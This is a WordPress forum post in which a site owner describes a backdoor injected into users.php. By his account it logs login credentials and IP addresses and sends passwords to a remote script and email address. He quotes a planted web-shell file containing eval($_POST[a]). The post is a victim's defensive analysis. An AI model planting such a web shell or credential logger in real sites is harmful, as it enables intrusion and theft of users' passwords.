users.php hack, do I need to warn my users?
-
Expires on 4/22/2013:
http://pastebin.com/embed_iframe.php?i=VVUhU9qFThis code was injected into my users.php file on or around Feb 22. I was informed by my host about a week later, but unsatisfactorily, I only discovered the injection portion today. It records the server name, username, password, and ip address. Failures to one log file, successful IPs to atnother. The failed password attempts log is cleaned weekly and the other doesn’t seem to be cleared ever.
There’s an interesting bit: First, it checks if it has the current IP as a success already. If so, the sets UserOk True. If the failure log contains more than 4 failed attempts from the IP address AND UserOk is False, then he sets a specific password. If this password works, then he phones home, twice.
I think this is so that the hacker can hit the login script at leisure without having to log back in.
Here’s what I want to confirm: It seems to be phoning passwords home both to a script and to an email address. If so, I need to contact my users and warn them to change their passwords.
Can you help me confirm that?
Also, can you forward this to the relevant security guru’s?——
Okay, here’s the dangerous part. Additionally, a file, /wp-admin/wp-class.php was created. This script did nothing but eval($_POST[a]). Clearly dangerous. So, I think we were also set up to be part of a bot net. Thoughts?
Thank you,
~ Shawn
PS I’m not sure what version of wordpress we were on when hacked. we’re now on 3.5.1.
- The topic ‘users.php hack, do I need to warn my users?’ is closed to new replies.